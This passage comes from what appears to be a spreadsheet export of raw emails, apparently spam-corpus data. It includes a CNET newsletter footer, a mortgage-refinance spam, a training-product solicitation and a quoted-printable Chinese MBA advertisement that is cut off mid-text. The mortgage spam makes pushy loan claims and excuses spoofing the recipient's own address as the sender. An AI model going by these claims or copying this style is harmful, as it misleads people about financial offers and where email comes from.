 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6jNJSv9KDFWVhZSgRXBsR" &gt;Downloads&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZH12E_3NEOiJGu_NEsnEPR" &gt;News&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0sj9x_wwOobvZm5yGKIaeR" &gt;Investing&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUf029bqz0rqMtNXjoCKqyR" &gt;Electronics&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8naPm1EchneplrQ8kasp4ZR" &gt;Web Building&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanyk_4O1omlXdIl9Oi-UidR" &gt;Help &amp; How-Tos&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0dz-rCWShr9i_f_B0NLncR" &gt;Internet&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLKgZcthgLWdT_pfmeDx0RR" &gt;Games&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEK6LGmw3zvpmtTwxp6DtFR" &gt;Message Boards&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f0-nv_DQWg4K4BZ7Zl2fqfAgMcXea9R" &gt;CNET TV &amp; Radio&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=05-gDULIG8WRwVMNHdfnODtxI8fiiuR"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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;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is&amp;nbsp;qqqqqqqqqq-cnet-newsletters@example.com&lt;p&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=1b-wArhzHN6zV8H5lHY2UHI4cE_R-Sh0sRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=30-u8NEIRrWEtApIg-8IeOdSKzjX19R" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKB680bDU0p-EDvznhjonleR"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href="http://clickthru.online.com/Click?q=5a-ahD1IP0IMbPRKKM24YOLpk6Td6yR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOLAbHx8WZt3RXvLF34ULXPR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=84-CCOyQ60Tyzz0AgaZsihsBSWgp7dR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdTjIl7vBM2H3f2jvrqULcR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ae-jOE6QMB1Lk4v1Vb8-mhe2RYEVuRR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLx-_MMLjhZ5znP-FdWuuFR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e441&amp;ISSUE=2002-07-11" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=d9-b7p_-APDUkNn7aFQfoNO23Y8HRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_34_5888148775635227063366114
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: Quoted-Printable
 We will help you get the mortgage loan you want! 
 Only takes 2 minutes to fill out our form. 
 http://xnet.123alias.com/index.php
 Whether a new home loan is what you seek or to refinance your current home =
 loan
 at a lower interest rate and payment, we can help!
 Mortgage rates haven't been this low in the last 12 months, take action now!
 Refinance your home with us and include all of those pesky credit card bills =
 or
 use the extra cash for that pool you've always wanted... 
 Where others says NO, we say YES!!!
 Even if you have been turned down elsewhere, we can help! 
 Easy terms! Our mortgage referral service combines the
 highest quality loans with most economical rates and the easiest =
 qualification!
 Click Here to fill out our form. 
 http://xnet.123alias.com/index.php
 ------=_NextPart_34_5888148775635227063366114
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!doctype html public "-//w3c//dtd html 4.0 transitional//en"&gt;
 &lt;html&gt;
 &lt;head&gt;
    &lt;meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; U) =
 [Netscape]"&gt;
    &lt;title&gt;Get the perfect mortgage fast. It's simple.&lt;/title&gt;
 &lt;/head&gt;
 &lt;body text=3D"#000000" bgcolor=3D"#FFFFFF"&gt;
 &lt;center&gt;&lt;table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"535"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img SRC=3D"http://xnet.123alias.com/images/headline.gif" NOSAVE height=3D24 =
 width=3D384&gt;
 &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font size=3D-1&gt;We can help
 find the perfect mortgage for you. Just click on the option below that
 best meets your needs:&lt;/font&gt;&lt;/font&gt;
 &lt;center&gt;&lt;table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"535" &gt;
 &lt;caption&gt;&amp;nbsp;&lt;/caption&gt;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
 php"&gt;Refinance
 your existing mortgage&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;i&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#666666"&gt;&lt;font =
 size=3D+0&gt;lower
 your payments&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/td&gt;
 &lt;td ALIGN=3DLEFT VALIGN=3DCENTER ROWSPAN=3D"4" WIDTH=3D"225"&gt;&lt;img SRC=3D"http://xnet.=
 123alias.com/images/mort_house_image2.jpg" NOSAVE height=3D122 width=3D196&gt;&lt;/td&gt;
 &lt;/tr&gt;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
 php"&gt;Consolidate
 your debt&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;i&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#666666"&gt;&lt;font =
 size=3D+0&gt;simplify
 your life&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/td&gt;
 &lt;/tr&gt;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href=3D"http://xnet.123alias.com/index.php"&gt;Home
 Equity financing&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;i&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#666666"&gt;&lt;font =
 size=3D+0&gt;get
 extra cash&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td ALIGN=3DCENTER VALIGN=3DTOP WIDTH=3D"60"&gt;
 &lt;center&gt;&lt;img SRC=3D"http://xnet.123alias.com/images/button_red.gif" NOSAVE =
 height=3D15 width=3D15&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;td ALIGN=3DLEFT VALIGN=3DTOP WIDTH=3D"250"&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif"&gt;&lt;font size=3D+0&gt;&lt;a href=3D"http://xnet.123alias.com/index.=
 php"&gt;Purchase
 a home&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;i&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#666666"&gt;&lt;font =
 size=3D+0&gt;there's
 never been a better time&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td ALIGN=3DCENTER VALIGN=3DTOP WIDTH=3D"60"&gt;&lt;img SRC=3D"http://xnet.123alias.=
 com/images/spacer.gif" height=3D10 width=3D60&gt;&lt;/td&gt;
 &lt;td ALIGN=3DLEFT VALIGN=3DTOP WIDTH=3D"250"&gt;&lt;img SRC=3D"http://xnet.123alias.=
 com/images/spacer.gif" height=3D10 width=3D250&gt;&lt;/td&gt;
 &lt;td ALIGN=3DLEFT VALIGN=3DCENTER WIDTH=3D"225"&gt;&lt;img SRC=3D"http://xnet.123alias.=
 com/images/spacer.gif" height=3D10 width=3D225&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font size=3D-1&gt;&lt;b&gt;Here's how it
 works... &lt;/b&gt;After completing a short form, we will automatically sort
 through our database of over 2700 lenders to find the ones most qualified
 to meet your needs. Up to three lenders will then contact you and compete
 for your business. The search is &lt;b&gt;free&lt;/b&gt; and &lt;b&gt;there's no obligation
 to continue.&lt;/b&gt; It's that easy, so &lt;b&gt;&lt;a href=3D"http://xnet.123alias.=
 com/index.php"&gt;click
 here&lt;/a&gt;&lt;/b&gt; to get started now!&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;center&gt;
 &lt;hr WIDTH=3D"540"&gt;&lt;/center&gt;
 &lt;center&gt;&lt;table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 COLS=3D1 WIDTH=3D"540" &gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;center&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D-2&gt;&lt;font =
 color=3D"#000000"&gt;This
 email was sent to you via Saf-E Mail Systems.&amp;nbsp; Your email address
 was automatically inserted into the To and From addresses to eliminate
 undeliverables which waste bandwidth and cause internet congestion. Your
 email or webserver &lt;b&gt;IS NOT &lt;/b&gt;being used for the sending of this mail.
 No-one else is receiving emails from your address. You may utilize the
 removal link below if you do not wish to receive this mailing. &lt;/font&gt;
 &lt;br&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D-2&gt;&amp;nbsp;&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;b&gt;Please &lt;a href=3D"http://xnet.123alias.com/remove.html"&gt;Remove =
 Me&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D-2&gt;&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font color=3D"#000000"&gt;&lt;font size=3D-2&gt;Saf-E =
 Mail Systems, PO Box 116-3015 San Rafael de Heredia, =
 CR&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_34_5888148775635227063366114--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Employee Productivity in Tough Times
</t>
  </si>
  <si>
    <t xml:space="preserve">During these tough economic times, how do you help a salesperson, a custo=
 mer service representative, or ANY employee improve his or her effectiven=
 ess and productivity if you don't know which SPECIFIC skills, habits or a=
 ttitudes need to be developed or enhanced?=20
 To introduce you to our unique training and development resources, we wou=
 ld like to offer you a free preview copy of any one of the following asse=
 ssments:
 Professional Selling SkillMap=99
 Customer Service SkillMap=99
 Emotional Effectiveness SkillMap=99
 Team Building SkillMap=99
 Professional Communication SkillMap=99
 You can visit us online at  www.frontlinelearning.com  for more informati=
 on, and you can request your free SkillMap preview at:  http://www.frontl=
 inelearning.com/contactus1.htm=20
 Please note: If you are NOT responsible for enhancing employee productivi=
 ty within your organization, please feel free to forward this message to =
 the appropriate individual(s).
 REMOVE INSTRUCTIONS: To remove yourself from our mailing list, click repl=
 y and type "REMOVE" in the &gt;SUBJECT&lt; Box.=20
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is a multi-part message in MIME format
 --3daab575-64bd-11d6-b6fa-0050ba415022
 Content-Type: text/plain; charset=gb2312
 Content-Transfer-Encoding: quoted-printable
                       WUT  =C6=FB=B3=B5=A1=A2=BD=BB=CD=A8=D0=D0=D2=B5   MBA
                     =B9=A4=C9=CC=B9=DC=C0=ED=CB=B6=CA=BF=D1=D0=BE=BF=C9=FA=BF=
 =CE=B3=CC=D1=D0=D0=DE=B0=E0
                          =D5=D0    =C9=FA    =BC=F2    =D5=C2
          =D0=D0=D2=B5=C8=A8=CD=FE=B4=F3=D1=A7=D6=F7=B0=EC  =C5=E0=D1=F8=D0=D0=
 =D2=B5=B8=DF=BC=B6=B9=DC=C0=ED=C8=CB=B2=C5   =D6=FD=BE=CD=CD=C5=CC=E5=BA=CF=D7=
 =F7=BE=AB=C9=F1
                   =B2=A9=B5=BC=B9=E3=D6=DD=C1=EC=CF=CE=CA=DA=BF=CE   =CC=E1=B9=
 =A9=C6=F3=D2=B5=B9=CB=CE=CA=B7=FE=CE=F1
                   =B9=FA=C4=DA=CD=E2MBA=C8=C8=C3=C5=BF=CE=B3=CC   =B9=FA=BC=CA=
 =C1=F7=D0=D0=BD=CC=D1=A7=C4=A3=CA=BD
              =B6=E0=C3=BD=CC=E5=BD=CC=D1=A7 =CB=AB=D3=EF=BD=CC=D1=A7 =B0=B8=C0=
 =FD=B7=D6=CE=F6  =B1=E7=C2=DB=C8=FC  =C3=FB=BC=D2=BD=B2=D7=F9
    =CE=AA=CC=E1=B8=DF=C6=FB=B3=B5=A1=A2=BD=BB=CD=A8=D0=D0=D2=B5=B8=F7=B2=E3=B4=
 =CE=A1=A2=B8=F7=B8=DA=CE=BB=C6=F3=D2=B5=D6=F7=B9=DC=B5=C4=B9=DC=C0=ED=CB=AE=C6=
 =BD=A3=AC=B4=AB=B2=A5=B9=FA=BC=CA=D7=EE=CF=C8=BD=F8=B5=C4=BE=AD=D3=AA=B9=DC=C0=
 =ED=C4=A3=CA=BD=A3=AC=C5=E0=D1=F8=CA=EC=C1=B7=D5=C6=CE=D5=CA=D0=B3=A1=BE=AD=BC=
 =C3=A3=AC=B4=D3=C8=DD=D3=A6=B6=D4=CE=B4=C0=B4=C6=FB=B3=B5=A1=A2=BD=BB=CD=A8=D0=
 =D0=D2=B5=B9=FA=BC=CA=BE=BA=D5=F9=B5=C4=B8=DF=BC=B6=BE=AD=D3=AA=B9=DC=C0=ED=C8=
 =CB=B2=C5=A3=AC=B4=EE=C6=F0=BD=CC=CA=DA=D3=EB=C6=F3=D2=B5=D6=AE=BC=E4=D0=D0=D2=
 =B5=B9=CB=CE=CA=D0=D4=C7=C5=C1=BA=A3=AC=CE=E4=BA=BA=C0=ED=B9=A4=B4=F3=D1=A7=A3=
 =A8=D4=AD=D6=D0=B9=FA=C6=FB=B3=B5=B9=A4=D2=B5=D7=DC=B9=AB=CB=BE=D6=D8=B5=E3=B4=
 =F3=D1=A7=CE=E4=BA=BA=C6=FB=B3=B5=B9=A4=D2=B5=B4=F3=D1=A7=A1=A2=CE=E4=BA=BA=B9=
 =A4=D2=B5=B4=F3=D1=A7=A1=A2=CE=E4=BA=BA=BD=BB=CD=A8=BF=C6=BC=BC=B4=F3=D1=A7=A3=
 =A9=BE=F6=B6=A8=BE=D9=B0=EC=B8=DF=BC=B6=D1=D0=D0=DE=B0=E0=A1=A3
 1=A1=A2=BC=F2=BD=E9
 =CE=E4=BA=BA=C0=ED=B9=A4=B4=F3=D1=A7=A3=A8=D4=AD=D6=D0=B9=FA=C6=FB=B3=B5=B9=A4=
 =D2=B5=D7=DC=B9=AB=CB=BE=D6=D8=B5=E3=B4=F3=D1=A7=CE=E4=BA=BA=C6=FB=B3=B5=B9=A4=
 =D2=B5=B4=F3=D1=A7=A1=A2=CE=E4=BA=BA=B9=A4=D2=B5=B4=F3=D1=A7=A1=A2=CE=E4=BA=BA=
 =BD=BB=CD=A8=BF=C6=BC=BC=B4=F3=D1=A7=A3=A9=CA=C7=C8=AB=B9=FA=C9=D9=CA=FD=BC=B8=
 =BC=D2=D3=B5=D3=D0=B9=A4=B3=CC=B9=DC=C0=ED=D4=BA=CA=BF=B5=C4=B9=DC=C0=ED=D1=A7=
 =D4=BA=D6=AE=D2=BB=A1=A3=B9=DC=C0=ED=D1=A7=D4=BA=CF=D6=D3=D0=BD=CC=CA=A6147=C8=
 =CB=A3=AC=C6=E4=D6=D0=B2=A9=CA=BF=C9=FA=B5=BC=CA=A612=C8=CB=A3=AC=BD=CC=CA=DA=
 28=C8=CB=A3=AC=B8=B1=BD=CC=CA=DA56=C8=CB=A3=AC=D3=D05=B8=F6=CB=B6=CA=BF=B5=E3=
 =BA=CD1=B8=F6MBA=CA=DA=C8=A8=B5=E3=A1=A3=B2=A2=D3=B5=D3=D0=B9=DC=C0=ED=BF=C6=
 =D1=A7=D3=EB=B9=A4=B3=CC=B2=A9=CA=BF=B5=E3=BA=CD=B9=DC=C0=ED=BF=C6=D1=A7=D3=EB=
 =B9=A4=B3=CC=B2=A9=CA=BF=BA=F3=C1=F7=B6=AF=D5=BE=A1=A3
 2=A1=A2=C8=EB=D1=A7=CC=F5=BC=FE=A3=BA
 =A1=F4=B4=F3=D1=A7=D2=D4=C9=CF=D1=A7=C0=FA=A3=BB         =A1=F4=C8=FD=C4=EA=D2=
 =D4=C9=CF=B9=A4=D7=F7=BE=AD=D1=E9=A3=BB     =A1=F4=D3=D0=D2=BB=B6=A8=B5=C4=C6=
 =F3=D2=B5=B9=DC=C0=ED=D6=AA=CA=B6=A3=BB
 3=A1=A2=D1=A7=CF=B0=B7=BD=CA=BD=A3=BA
 =A1=F4=BC=AF=D6=D0=C3=E6=CA=DA=D3=EB=D2=B5=D3=E0=D1=A7=CF=B0=CF=E0=BD=E1=BA=CF=
 =A3=AC=D6=DC=C1=F9=A1=A2=D6=DC=C8=D5=BC=AF=D6=D0=C9=CF=BF=CE=A3=BB
 =A1=F4=CA=B5=D0=D0=D1=A7=B7=D6=D6=C6=A3=AC=D1=A7=D4=B1=BF=C9=D7=D4=D1=A1=D4=F1=
 =D1=A7=CF=B0=CA=B1=BC=E4=D3=EB=B5=D8=B5=E3=A3=BB
 =A1=F4=BF=CE=B3=CC=D1=A7=CF=B0=CE=AA=D2=BB=C4=EA=B0=EB=A1=A3
 4=A1=A2=CA=A6=D7=CA=C5=E4=B1=B8=A3=BA
 =A1=F4=D3=C9=CE=E4=BA=BA=C0=ED=B9=A4=B4=F3=D1=A7=A3=A8=D4=AD=D6=D0=B9=FA=C6=FB=
 =B3=B5=B9=A4=D2=B5=D7=DC=B9=AB=CB=BE=D6=D8=B5=E3=B4=F3=D1=A7=CE=E4=BA=BA=C6=FB=
 =B3=B5=B9=A4=D2=B5=B4=F3=D1=A7=A1=A2=CE=E4=BA=BA=B9=A4=D2=B5=B4=F3=D1=A7=A1=A2=
 =CE=E4=BA=BA=BD=BB=CD=A8=BF=C6=BC=BC=B4=F3=D1=A7=A3=A9=B2=A9=CA=BF=C9=FA=B5=BC=
 =CA=A6=A3=AC=C6=FB=B3=B5=A1=A2=BD=BB=CD=A8=D0=D0=D2=B5=B9=FA=BC=CA=D6=AA=C3=FB=
 =D1=A7=D5=DF=C1=AA=BA=CF=D6=F7=BD=B2=A1=A3=C8=B7=B1=A3=BD=CC=D1=A7=D6=CA=C1=BF=
 =B4=EF=B5=BD=D0=D0=D2=B5=B5=DA=D2=BB=A1=A3
 5=A1=A2MBA=BF=BC=C7=B0=B8=A8=B5=BC=A3=BA
 =CA=B1=BC=E4=A3=BA =A3=A81=A3=A9 MBA=B5=A5=D6=A4=BF=BC=C7=B0=B8=A8=B5=BC=B0=E0=
 =A3=BA=C3=BF=C4=EA7=D4=C2=B7=DD=A1=A29=D4=C2=B7=DD=BC=AF=D6=D0=B8=A8=B5=BC2=B4=
 =CE=A1=A3
 =A3=A82=A3=A9MBA=CB=AB=D6=A4=BF=BC=C7=B0=B8=A8=B5=BC=B0=E0=A3=BA=C3=BF=C4=EA=
 9=D4=C2=D6=C1=BF=BC=C7=B0=A1=A3
 6=A1=A2=D6=A4=CA=E9=A3=BA
 =A1=F4=D0=DE=CD=EA=CB=F9=D3=D0=BF=CE=B3=CC=A3=AC=B3=C9=BC=A8=BA=CF=B8=F1=A3=AC=
 =BB=F1=CE=E4=BA=BA=C0=ED=B9=A4=B4=F3=D1=A7=A3=A8=D4=AD=D6=D0=B9=FA=C6=FB=B3=B5=
 =B9=A4=D2=B5=D7=DC=B9=AB=CB=BE=D6=D8=B5=E3=B4=F3=D1=A7=CE=E4=BA=BA=C6=FB=B3=B5=
 =B9=A4=D2=B5=B4=F3=D1=A7=A1=A2=CE=E4=BA=BA=B9=A4=D2=B5=B4=F3=D1=A7=A1=A2=CE=E4=
 =BA=BA=BD=BB=CD=A8=BF=C6=BC=BC=B4=F3=D1=A7=A3=A9=D0=A3=B3=A4=C7=A9=C3=FB=A1=A2=
 =D1=A7=D0=A3=B8=D6=D3=A1=BD=E1=D2=B5=D6=A4=CA=E9=A3=AC=CD=A8=B9=FD=BF=BC=CA=D4=
 =BA=F3=BF=C9=C9=EA=C7=EBMBA=D1=A7=CE=BB=D6=A4=CA=E9
 =A1=F4=CA=B5=D0=D0=B6=E0=D6=D6=B6=D4=BD=D3=B7=BD=CA=BD=A3=BA
 =A3=A81=A3=A9=CB=B6=CA=BF=BD=F8=D0=DE=B0=E0=B5=C4=D1=A7=D4=B1=A3=AC=B7=FB=BA=
 =CF=CC=F5=BC=FE=D5=DF=BF=C9=B2=CE=BC=D3=C9=EA=C7=EB=CB=B6=CA=BF=D1=A7=CE=BB=BF=
 =BC=CA=D4=A3=BB
 =A3=A82=A3=A9=B7=FB=BA=CF=CC=F5=BC=FE=D5=DF=BF=C9=B2=CE=BC=D3MBA=B5=A5=D6=A4=
 =C1=AA=BF=BC=BA=CDMBA=CB=AB=D6=A4=C1=AA=BF=BC=A3=BB
 =A3=A83=A3=A9=CD=C6=BC=F6=B7=FB=BA=CF=CC=F5=BC=FE=D5=DF=BD=F8=C8=EB=C3=C0=B9=
 =FA=D3=D0=B9=D8=B4=F3=D1=A7=BD=F8=D0=DE=D1=A7=CF=B0=B2=A2=C8=A1=B5=C3=CB=B6=CA=
 =BF=D1=A7=CE=BB=A1=A3
 7=A1=A2=D1=A7=B7=D1=A3=BA
 =A1=F4=D1=A7=B7=D1=C3=BF=C8=CB15000=D4=AA=A3=BB
 =A1=F4=BD=CC=B2=C4=B7=D1=A1=A2=D7=CA=C1=CF=B7=D1=C3=BF=C8=CB1000=D4=AA=C1=ED=
 =CA=D5=A3=BB
 =A1=F4=B1=A8=C3=FB=B7=D1=C3=BF=C8=CB100=D4=AA=A1=A3
 8=A1=A2=C9=CF=BF=CE=B5=D8=B5=E3=A3=BA=B9=E3=D6=DD
 9=A1=A2=BC=A4=C0=F8=B4=EB=CA=A9=A3=BA
 =A3=A81=A3=A9
 =B9=E3=B6=AB=B5=D8=C7=F8=CA=D5=B7=D1=D7=EE=B5=CD=A3=BB
 =A3=A82=A3=A9
 =B7=B2=C8=AB=B9=FA=BF=BC=CA=D4=B4=EF=CF=DF=D5=DF=D3=C5=CF=C8=C2=BC=C8=A1=A3=BB=
 =A3=A83=A3=A9
 =B6=D4MBA=D1=A7=D4=B1=B7=A2=B1=ED=C2=DB=CE=C4=D3=E8=D2=D4=BD=B1=C0=F8=A3=BB
 =A3=A84=A3=A9 =D7=CA=D6=FAMBA=D1=A7=D4=B1=B2=CE=BC=D3=D0=A3=C4=DA=CD=E2=BB=EE=
 =B6=AF=A3=AC=B6=D4=B2=CE=BC=D3=B9=FA=BC=CA=C6=F3=D2=B5=B9=DC=C0=ED=CC=F4=D5=BD=
 =BA=AE=BD=F8=C8=EB=BE=BA=C8=FC=BB=F2=BB=F1=B5=C3=C3=FB        =B4=CE=B5=C4=
 MBA=D1=A7=C9=FA=D3=E8=D2=D4=D6=D8=BD=B1=A1=A3
 10=A1=A2=B6=C0=CC=D8=D3=C5=CA=C6=A3=BA
   =A1=F4=C6=FB=B3=B5=A1=A2=BD=BB=CD=A8=D0=D0=D2=B5=CE=A8=D2=BB=B8=DF=BC=B6=B9=
 =DC=C0=ED=C8=CB=D4=B1=C5=E0=D1=B5=BB=FA=B9=B9=A3=BB
   =A1=F4=D0=D0=D2=B5=C8=A8=CD=FE=D7=A8=BC=D2=CE=AA=C6=F3=D2=B5=CC=E1=B9=A9=B9=
 =CB=CE=CA=D0=D4=C5=E0=D1=B5=B7=FE=CE=F1=A3=AC=CE=AA=C6=F3=D2=B5=B7=A2=D5=B9=B3=
 =F6=C4=B1=BB=AE=B2=DF=A3=BB
   =A1=F4=B6=E0=D6=D6=B6=D4=BD=D3=B7=BD=CA=BD=A3=AC=D3=D0=D6=FA=D1=A7=D4=B1=C8=
 =A1=B5=C3=B9=FA=BC=D2=A1=A2=B9=FA=BC=CA=B3=D0=C8=CF=B5=C4=D1=A7=CE=BB=D6=A4=CA=
 =E9=A1=A3
 11=A1=A2=B1=A8=C3=FB=D7=E9=D6=AF=A3=BA
   =A1=F4=D6=F7=B0=EC=B5=A5=CE=BB=A3=BA=CE=E4=BA=BA=C0=ED=B9=A4=B4=F3=D1=A7=A3=
 =A8=D4=AD=D6=D0=B9=FA=C6=FB=B3=B5=B9=A4=D2=B5=D7=DC=B9=AB=CB=BE=D6=D8=B5=E3=B4=
 =F3=D1=A7=CE=E4=BA=BA=C6=FB=B3=B5=B9=A4=D2=B5=B4=F3=D1=A7=A1=A2              =
 =CE=E4=BA=BA=B9=A4=D2=B5=B4=F3=D1=A7=A1=A2=CE=E4=BA=BA=BD=BB=CD=A8=BF=C6=BC=BC=
 =B4=F3=D1=A7=A3=A9
   =A1=F4=D7=C9=D1=AF=B7=BD=CA=BD=A3=BA
     =A3=A81=A3=A9=B9=E3=D6=DDTEL=A3=BA020-87515870/87577289     FAX=A3=BA=
 020-87515015
          =C1=AA=CF=B5=C8=CB=A3=BA=D5=C5=C0=CF=CA=A6=A1=A2=D0=DC=C0=CF=CA=A6
     =A3=A82=A3=A9=CE=E4=BA=BATEL=A3=BA027-87859039              FAX=A3=BA=
 027-87859231
          =C1=AA=CF=B5=C8=CB=A3=BA=B4=F7=C0=CF=CA=A6=A1=A2=CE=E2=C0=CF=CA=A6
   =A1=F4=CD=A8=D1=B6=B5=D8=D6=B7=A3=BA=B9=E3=D6=DD=CA=D0=CC=EC=BA=D3=C7=F8=CC=
 =E5=D3=FD=B6=AB=C2=B733=BA=C5=A3=A8=CC=EC=CA=A2=B4=F3=CF=C3=C4=CF=CB=FE=A3=A9=
 804=CA=D2
              =A3=A8=D3=CA=B1=E0=A3=BA510635=A3=A9
   =A1=F4=B1=A8=C3=FB=CA=D6=D0=F8=A3=BA
     =A3=A81=A3=A9=CC=E1=BD=BB=B8=F6=C8=CB=BC=F2=C0=FA=A1=A2=D1=A7=C0=FA=BB=F2=
 =D1=A7=CE=BB=D6=A4=CA=E9=B8=B4=D3=A1=BC=FE=B8=F71=B7=DD=A3=BB
     =A3=A82=A3=A9=B3=F5=C9=F3=BA=CF=B8=F1=BA=F3=A3=AC=CC=E1=BD=BB=B1=A8=C3=FB=
 =B1=ED=A3=BB
     =A3=A83=A3=A9=B8=B4=C9=F3=BA=CF=B8=F1=BA=F3=A3=AC=BC=C4=B7=A2=C8=EB=D1=A7=
 =CD=A8=D6=AA=CA=E9=A3=BB
     =A3=A84=A3=A9=CA=D5=B5=BD=C8=EB=D1=A7=CD=A8=D6=AA=CA=E9=BA=F3=A3=AC=D1=A7=
 =D4=B1=BC=A4=C4=C9=D1=A7=B7=D1=BC=B0=CA=E9=B1=BE=B7=D1=A1=A3=B7=BD=CA=BD=D3=D0=
